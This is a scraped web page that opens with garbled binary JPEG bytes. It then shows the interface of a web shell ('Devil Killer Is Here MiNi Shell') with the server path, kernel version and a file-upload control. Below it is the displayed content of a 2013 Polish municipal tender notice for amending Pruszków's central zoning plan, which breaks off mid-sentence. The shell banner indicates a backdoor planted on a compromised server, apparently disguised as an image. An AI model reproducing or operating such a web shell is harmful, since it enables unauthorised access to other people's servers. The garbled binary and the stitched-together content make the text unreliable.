JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/497436-N-2013.html

<p class="kh_header"><b>Pruszków: Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego kwartał Centrum w Pruszkowie.</b><br>
<b>Numer ogłoszenia: 497436 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego kwartał Centrum w Pruszkowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1/ Przedmiotem zamówienia jest sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego kwartału Centrum  w Pruszkowie, uchwalonego uchwałą Nr IX/83/07 Rady Miejskiej w Pruszkowie z dnia 31 maja 2007r. opublikowaną w Dz. Urz. Województwa Mazowieckiego z dnia 5 lipca 2007r. Nr 126, poz. 3318, zgodnie z przepisami ustawy o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 r. (tj. Dz U z 2012r., poz. 647 z póżn.zm.) oraz stosownymi przepisami wykonawczymi, jak również zgodnie z podjętą Uchwałą Nr XXXVII/335/2013 Rady Miejskiej w Pruszkowie z dnia 26 września 2013r., w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego  kwartału Centrum 
w Pruszkowie.

Obszar opracowania:
1)  od północy: w kierunku wschodnim, zaczynając od punktu A usytuowanego na osi  Al. Wojska 
     Polskiego  wzdłuż osi ul. Tadeusza Kościuszki do punktu B usytuowanego na osi ul. Bolesława Prusa 
     poprowadzonej wzdłuż granicy obrębów nr 21 i 23;
2)  od wschodu: od punktu B usytuowanego na osi ul. Bolesława Prusa poprowadzonej wzdłuż granicy 
     obrębów nr 21 i 23 do punktu C usytuowanego na przecięciu osi ul. Bolesława Prusa i Al. Niepodległości;
3)  od południa: od punktu C usytuowanego na przecięciu osi ul. Bolesława Prusa i Al. Niepodległości 
     wzdłuż osi Al. Niepodległości do punktu D usytuowanego na przecięciu osi Al. Niepodległości 
      i Al. Wojska Polskiego;
4) od zachodu: od punktu D usytuowanego na przecięciu osi ul. Al. Niepodległości i Al. Wojska Polskiego, 
    wzdłuż osi Al. Wojska Polskiego do punktu A.
     
- Skala opracowania planu:  1 : 1000   
- Powierzchnia - ok  5,41 ha

OBOWIĄZKOWY WPIS DLA  WW.  ZADANIA  
a/ Miejscowy plan zagospodarowania przestrzennego sporządzany jest w celu ustalenia przeznaczenia terenów, rozmieszczenia inwestycji celu publicznego oraz określenia sposobów zagospodarowania i warunków zabudowy, z uwzględnieniem nie naruszenia ustaleń Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Pruszkowa (w, tym z uwzględnieniem  zmienianego   Studium) oraz  w myśl art. 15  ust. 2  ustawy  z  dnia 27  marca  2003 r. o planowaniu  i  zagospodarowaniu  przestrzennym (tj. Dz U z 2012r., poz. 647 z pózn. zm.) 
z  wykorzystaniem analiz stanu istniejącego oraz zgodnie z przepisami  odrębnymi  odnoszącymi  się  do  obszaru objętego  planem.

b/ Miejscowy plan zagospodarowania przestrzennego zostanie sporządzony z uwzględnieniem regulacji Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164, poz. 1587) oraz ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.).
c/ Przedmiotem zamówienia jest sporządzenie zgodnie z podjętą Uchwałą Nr XXXVII/335/2013 Rady Miejskiej w Pruszkowie z dnia 26 września 2013 r..,  w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego kwartału Centrum w Pruszkowie.
d/ Przy sporządzaniu projektu planu należy uwzględnić ustalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Pruszkowa (uchwała Nr XXVIII /309/2000 Rady Miejskiej w Pruszkowie z dnia 16 listopada 2000 r.) z uwzględnieniem prowadzonej zmiany Studium. W przypadku zmiany w trakcie opracowywania projektu planu: Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Pruszkowa lub innych aktów prawa, mogących wpłynąć na zmianę trybu  i zakresu przygotowania opracowania objętego umową, projekt planu winien zostać dostosowany do nowej sytuacji prawnej. 
e/Sporządzany projekt zmiany miejscowego planu zagospodarowania przestrzennego powinien być skoordynowany z sąsiednimi obowiązującymi miejscowymi planami zagospodarowania przestrzennego lub sporządzanymi miejscowymi planami zagospodarowania przestrzennego.
f/Projekt powinien uwzględniać ustalenia wynikające z opracowania ekofizjograficznego sporządzonego dla  obszaru m. Pruszkowa i innych opracowań specjalistycznych wykonanych z uwzględnieniem specyfiki terenu.
g/ Wykonawca jest zobowiązany do przygotowania na etapie przekazania projektu planu Radzie Miejskiej do uchwalenia,  tekstu uchwały w formacie XML, tj. w formie wymaganej do publikacji w Dzienniku Urzędowym Województwa Mazowieckiego. Na tym etapie nośnik cyfrowy winien zawierać wersję TIF lub PDF.
h/ W procedurze sporządzania projektu planu, w części włącznie od etapu projektu planu przedstawionego Zamawiającemu do zaakceptowania, wymagana jest współpraca Wykonawcy z prawnikiem - w kwestii sprawdzenia i parafowania projektu planu. 
 
DANE WEJŚCIOWE:
 a/ Uchwała Nr IX/83/07 Rady Miejskiej w Pruszkowie z dnia 31 maja 2007r. w sprawie miejscowego planu zagospodarowania przestrzennego kwartału Centrum  w Pruszkowie, opublikowana w Dz. Urz. Województwa Mazowieckiego z dnia 5 lipca 2007r. Nr 126, poz. 3318.  
b/ Uchwała Nr XXXVII/335/2013 Rady Miejskiej w Pruszkowie z dnia 26  września 2013 r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego kwartału Centrum  w Pruszkowie.
c/ Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Pruszkowa zatwierdzonego uchwałą Nr XXVIII/309/2000 Rady Miejskiej w Pruszkowie z dnia 16 listopada 2000 r . 
z uwzględnieniem ustaleń sporządzanej zmiany Studium,
d/ Aktualizacja opracowania ekofizjograficznego sporządzonego w 2011 r. dla całego Miasta Pruszkowa,
e/ Skalibrowaną mapę zasadniczą z nakładkami SURE na nośniku elektronicznym, bazę granic ewidencyjnych działek, 
f/ Wnioski osób i organów złożone do  miejscowego planu zagospodarowania przestrzennego,
g/ Decyzje o warunkach zabudowy i zagospodarowania terenu oraz kopie decyzji 
o pozwoleniu na budowę,
h/ Strategia Rozwoju Miasta do 2020 r.
i/ Wieloletni Plan Inwestycyjny, 
j/ Wykaz obiektów zainteresowania konserwatorskiego,
k/ Wykaz terenów we własności Miasta  i Skarbu Państwa.

ZAKRES  USTALEŃ  PLANU
Plan  jest sporządzany w skali 1: 1000 i zawiera ustalenia zawarte w art. 15 ustawy o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003r. (tj. Dz U z 2012r., poz. 647), a w szczególności:
1) wszystkie ustalenia zawarte w  art. 15 ust. 2 ww. ustawy,
2) w zależności od potrzeb ustalenia zawarte w art. 15 ust. 3 ww. ustawy, a w szczególności zasady rozmieszczenia reklam i znaków informacyjnych, oraz wytyczne do projektowania przestrzeni uwzględniające potrzeby osób  niepełnosprawnych.

1.2  ZAKRES PRAC:

1.2.1.  część I- analiza danych wejściowych:                
Wykonawca jest zobowiązany, do wykonania:          
1/ inwentaryzacji urbanistycznej, z uwzględnieniem minimum: przeznaczenia terenu, stanu zabudowy, urządzeń komunikacji, inżynierii, zieleni, określeniem źródła i rodzaju uciążliwości, 
2/ inwentaryzacji stanu własności i władania, użytkowania wieczystego, w  tym  zamieszczonych na mapie zasadniczej linii rozgraniczających dróg istniejących i planowanych,
3/ analizy ustaleń projektu zmiany studium uwarunkowań dla obszaru sporządzanego projektu planu ,
4/ zebranie wniosków, przekazanych przez Prezydenta, w tym  wniosków z postępowania w sprawie przeprowadzenia strategicznej oceny oddziaływania na środowisko,
5/ opracowanie koncepcji projektu planu w skali 1:1000, z ewentualną wizualizacją, uwzględniającą wyniki przeprowadzonych analiz, oraz z propozycją rozstrzygnięć w/s wniosków,
6/ przedstawienia koncepcji projektu planu Zamawiającemu wraz z analizami ze szczególnym uwzględnieniem powierzchni terenu niezbędnego do pozyskania przez miasto pod inwestycje celu publicznego oraz z propozycją rozstrzygnięć w/s wniosków. Wykaz wniosków w tabeli wg wzoru 
z rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. 
W przypadku takiej potrzeby wnioski z zaznaczeniem zasięgu terenowego na mapie, co najmniej  w skali 1:5000.
7/ uzyskania akceptacji Zamawiającego do przedstawionej koncepcji projektu planu,
8/ sporządzenia Raportu o stanie istniejącym, zawierającego:
   - niezbędne studia, 
   - analizy, w tym o stanie demograficzno- społecznym,
   - wykaz problemów i kolizji występujących na obszarze opracowania wymagających rozstrzygnięć 
     planistycznych dotyczących: własności,  dodatkowych opracowań planistycznych, wyposażenia 
     w infrastrukturę techniczną, problemów ochrony środowiska w tym, stanu funkcjonowania istniejącej 
     zieleni,
- problemów dziedzictwa kulturowego i przestrzeni publicznych,
9/ wraz z ostateczną koncepcją projektu planu oraz przekazanie wykonanych powyższych materiałów planistycznych Zamawiającemu. 		
 					
1.2.2.część II - projektowanie:
Wykonawca jest zobowiązany, do wykonania:          
1. projektu planu, składającego się z projektu uchwały zawierającej część tekstową tj.: ustalenia planu, rysunku planu w skali  1:1000 na  kopii mapy zasadniczej, udostępnionej przez  Zamawiającego - w 1 egz,  następnie przedstawienia projektu planu Zamawiającemu w celu uzyskania akceptacji Zamawiającego,
2. po uzyskaniu akceptacji opracowanego projektu planu przez Zamawiającego opracowania  projektu planu, składającego się z projektu uchwały zawierającej część tekstową planu; rysunku planu w skali 1:1000; prognozy oddziaływania na środowisko uwzględniającej wymagania  zawarte w przepisach ustawy z dnia   3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko w -  1 egz.  
3. wykonania projektu planu w następującej formie:
- zapis treści uchwały i prognozy w formie dokumentu doc. lub docx.,
- rysunek planu w formie PDF ,
4. opracowania uzasadnień uwzględnienia i nieuwzględnienia wniosków w projekcie planu, w 1 egz.
5. przekazania powyższych materiałów Zamawiającemu

1.2.3.część III - wstępna prognoza skutków finansowych:
Wykonawca jest zobowiązany, do wykonania:          
1. opracowania wstępnej  prognozy skutków finansowych uchwalenia planu uwzględniającej wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr  164, poz. 1587) oraz przepisów o gospodarce nieruchomościami w odniesieniu do zasad i do osób uprawnionych do określania tych skutków, zawierającej:
  	 a. prognozę wpływu ustaleń planu na dochody własne i wydatki miasta, w tym na:
    	   -  wpływy z podatku od nieruchomości,
        -  inne dochody związane z obrotem nieruchomościami miasta,
        - na opłaty i odszkodowania, o których mowa w art. 36 ustawy o planowaniu i zagospodarowaniu  
          przestrzennym z wyodrębnieniem poszczególnych funkcji przeznaczenia terenu,
        - prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji z zakresu infrastruktury 
          technicznej, które należą do zadań własnych miasta,  
        - wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań projektu planu, w tym stawek  
          procentowych, na podstawie których ustala się opłatę, o której mowa w art. 36 ust. 4 ustawy 
          o planowaniu i zagospodarowaniu przestrzennym, wynikające z uwzględnienia ich skutków finansowych, 
b. przekazanie wykonanej prognozy w 1 egz. Zamawiającemu.

1.2.4.część IV - komisja urbanistyczno-architektoniczna:
Wykonawca jest zobowiązany do ;
1.udziału w posiedzeniu Komisji  urbanistyczno-  architektonicznej,
2.wprowadzenia do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii Komisji,
3.opracowania uzasadnień nieuwzględnienia, w projekcie planu, uwag Komisji urbanistyczno-architektonicznej,
4.przekazania materiałów  poz. 2 i 3 w 1 egz., Zamawiającemu, 
5. uzyskania od Zamawiającego stanowiska w sprawie uwzględnienia/nieuwzględnienia uwag Komisji.

1.2.5.część V- uzgodnienia i opiniowanie projektu  planu
Wykonawca jest zobowiązany, do ;
1.wykonania projektu planu tj. treść uchwały w formie dokumentu doc. lub docx., wraz z rysunkiem planu, treść prognozy w formie dokumentu doc. lub docx., wraz z rysunkiem prognozy- w ilości niezbędnej do wysłania do uzgodnień i opiniowania( wersja tradycyjna- 4 egzemplarze+ wersja elektroniczna),            
2.uzyskania opinii i uzgodnień projektu planu oraz prognozy oddziaływania na środowisko od właściwych organów-w imieniu Zamawiającego, wymaganych ustawą  o planowaniu 
i zagospodarowaniu przestrzennym i innymi  przepisami  szczególnymi,  
3. wprowadzenia do projektu planu i do projektu prognozy oddziaływania na środowisko (aneks) ewentualnych korekt wynikających z uzyskanych opinii i dokonanych uzgodnień od właściwych organów, w celu ewentualnego ponowienia uzgodnień i opinii,   
4. opracowania  uzasadnień  nieuwzględnienia w projekcie  planu, uwag  organów opiniujących i uzgadniających oraz sporządzenie podsumowania i uzasadnienia uwzględnionych i nieuwzględnionych uwag do prognozy,
5. przekazania Zamawiającemu projektu planu i prognozy uwzględniającego uzgodnienia 
i opinie:  1 egz.- w wersji tekstowej oraz 1 egz. rysunku planu i rysunku prognozy (wersja tradycyjna) jak również 1 egz. - całość w wersji elektronicznej na płycie CD, wraz z uzasadnieniami,
6. udziału  w spotkaniach, naradach oraz posiedzeniach Komisji Rady Miejskiej przed wyłożeniem projektu planu,
7. wprowadzenia ewentualnych zmian do projektu planu wniesionych przez Komisje Rady Miejskiej
8.przekazanie Zamawiającemu, parafowanego przez prawnika projektu planu i prognozy uwzględniającego uzgodnienia i opinie:  1 egz.- w wersji tekstowej oraz 1 egz. rysunku planu i rysunku prognozy (wersja tradycyjna) jak również 1 egz. - całość w wersji elektronicznej na płycie CD, wraz z uzasadnieniem  ew. nie przyjęcia uwag Komisji Rady.

1.2.6.część VI - wyłożenie i dyskusja publiczna:
Wykonawca jest zobowiązany, do
1.udziału w dyskusji publicznej nad wyłożonym do wglądu publicznego  projektem planu,
2.opracowania analizy uwag wniesionych do projektu planu wraz z propozycją ich  uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych w 1 egz.,
3.przedstawienia proponowanych rozstrzygnięć Zamawiającemu i uzyskanie stanowiska Zamawiającego, 
4.po uzyskaniu akceptacji Zamawiającego sporządzenia wykazu uwag w tabeli wg wzoru z rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r.,
5.wprowadzenia do projektu planu oraz do projektu prognozy korekt wynikających z rozpatrzenia uwag,   
6.przekazania skorygowanego projektu planu i  prognozy Zamawiającemu w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD,
7. ewentualne  ponowienie uzgodnień i opiniowania w niezbędnym zakresie, 
8. wprowadzenia do projektu planu korekt wynikających z ponownych uzgodnień i opiniowania,
9. ewentualne ponowne  wyłożenie i dyskusja publiczna.

1.2.7. część VII - ostateczna prognoza skutków finansowych

1.2.8.część VIII -  opracowanie projektu planu do przedłożenia Radzie Miejskiej do uchwalenia:
Wykonawca jest zobowiązany, do;:          
1.opracowania ostatecznej wersji projektu tekstu planu w formie uchwały w doc. lub docx., i XML,
2.opracowanie załącznika nr 1 rysunku planu w skali  1:1000,     
3.opracowanie zał. Nr 2  projektu rozstrzygnięć przez Radę Miejską o sposobie rozpatrzenia uwag do projektu planu nieuwzględnionych przez Prezydenta Miasta w 1 egz. - wersja tradycyjna i w XML,
4.opracowanie  zał. Nr 3  projektu rozstrzygnięcia o sposobie realizacji, zapisanych w planie, inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz zasadach ich finansowania w 1 egz. - wersja tradycyjna i w XML,
5.udziału w posiedzeniach Komisji Rady Miejskiej oraz na sesji Rady Miejskiej poprzez:
- prezentacji projektu planu: Prezydentowi Miasta Pruszkowa oraz Komisji Rady Miejskiej w Pruszkowie,
- przedstawienia projektu planu Radzie Miejskiej do uchwalenia wraz z załącznikami ( udział w Sesji Rady Miejskiej w Pruszkowie), 
- wprowadzenia zmian do projektu planu wniesionych przez Radę Miejską i udział w czynnościach  ponowionej, w niezbędnym zakresie, procedury planistycznej,

1.2.9.część IX- po uchwaleniu:
1.Wykonawca jest zobowiązany, do skompletowania projektu planu w ciągu 2 dni od daty uchwalenia przez Radę Miejską tj. 
1/sprawdzenia i przedłożenia tekstu uchwały w formie XML,
2/ sprawdzenia i przedłożenia załączników nr 2 i 3 jako załączników w XML,
3/ sprawdzenia i przedłożenia rysunku planu zał. Nr 1 ( w arkuszach) jako załącznika do XML,
4/ przekazania zamawiającemu wymienionych w pkt a, b i c załączników w formie elektronicznej (XML) oraz w formie tradycyjnej papierowej ( w formie papierowej  7 egz. rysunku planu w skali 1:1000 ).
2.Wykonawca jest zobowiązany, do wykonania;
a. przygotowania do przekazania Wojewodzie Mazowieckiemu w ciągu 5 dni od daty  uchwalenia planu miejscowego  - dokumentacji planistycznej zgodnie z § 12 Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r ( Dz. U. z  2003r. Nr 164, poz. 1587).
b. zgodnie z art. 43 pkt 1 i pkt 2 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, sporządzenie uzasadnienia i podsumowania,
c. sporządzenia wykazu dot. łącznej powierzchni przeznaczenia terenów w uchwalonym miejscowym planie zagospodarowania przestrzennego ( ha)-  w rozbiciu na:
1/ powierzchnie miejscowego planu zagospodarowania przestrzennego -ogółem,
2/ powierzchnie zabudowy mieszkaniowej: ogółem w tym pow. zabudowy wielorodzinnej,
3/ powierzchnie zabudowy usługowej: ogółem w tym pow. usług publicznych,
4/ powierzchnie użytkowane rolniczo,
5/ powierzchnie zabudowy usługowo- produkcyjnej i produkcyjnej
6/ powierzchnie zieleni i wód,
7/ powierzchnie komunikacji,
8/ powierzchnie infrastruktury technicznej,
d. udziału w czynnościach niezbędnych (wyjaśniających) do ewentualnego doprowadzenia planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały  w  sprawie  planu, w tym udział w postępowaniu przed sądami administracyjnymi.

1.3 WARUNKI REALIZACJI ZAMÓWIENIA:
1.Wykonawca zobowiązuje się do:
  a) opracowania zmiany  miejscowego planu zgodnie z postanowieniami  ustawy  z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu  przestrzennym  ( (t. j. Dz U z 2012r., poz. 647)) i aktami wykonawczymi do tej ustawy,  obowiązującymi  normami i normatywami.
  b)przedstawienia dokumentów wynikających z ww. zakresu prac  - Prezydentowi Miasta Pruszkowa,
  c)uczestnictwa w spotkaniach, konsultacjach, naradach z Zamawiającym,  
  d) uzyskania opinii i uzgodnień projektu planu oraz prognozy oddziaływania na środowisko od właściwych organów-w imieniu Zamawiającego, wymaganych ustawą  o planowaniu i zagospodarowaniu przestrzennym i innymi  przepisami  szczególnymi,   
  e)udziału autora projektu  planu w spotkaniach zorganizowanych w ramach, wymaganej ustawą  o planowaniu i zagospodarowaniu przestrzennym, dyskusji publicznej nad przyjętymi w projekcie  planu i w prognozie rozwiązaniami,
  f) prezentacji opracowań na posiedzeniach komisji, zebraniach z mieszkańcami oraz na sesji Rady Miejskiej w Pruszkowie.
  g)opracowania uzasadnień nieuwzględnienia uwag wniesionych do wyłożonego projektu planu i prognozy do publicznego wglądu i udziału autora projektu planu  na naradzie u  Prezydenta Miasta Pruszkowa, na którym przedmiotowe uwagi będą rozpatrywane, naniesienia w projekcie planu korekt wynikających z uwzględnienia uwag właściwych organów oraz uwag wniesionych do wyłożonego projektu i prognozy, udziału autora projektu planu w posiedzeniach Komisji Rady Miejskiej opiniujących projekt planu oraz  w sesji Rady Miejskiej uchwalającej plan,
  h) sporządzenie dokumentacji do RDOŚ i PPIS zgodnie z  art.55 ust. 3 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko,
   i) przygotowanie do przekazania Wojewodzie Mazowieckiemu w ciągu 5 dni od daty  uchwalenia planu miejscowego  - dokumentacji planistycznej zgodnie z § 12 Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r ( Dz. U. z  2003r. Nr 164, poz. 1587) ,  
  j) sporządzenie wykazu dot. łącznej powierzchni przeznaczenia terenów w miejscowym planie zagospodarowania przestrzennego (w ha).    

- Dokumentacja winna być wykonana zgodnie z  obowiązującymi przepisami, a zastosowane 
    rozwiązania projektowe winny zapewnić ekonomiczną realizację założeń planu. Wszystkie 
    elementy dokumentacji muszą być uzgodnione z Zamawiającym..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 Ustawy Pzp do wysokości 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony jeżeli Wykonawca wykaże się 
wykonaniem  usług  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres 
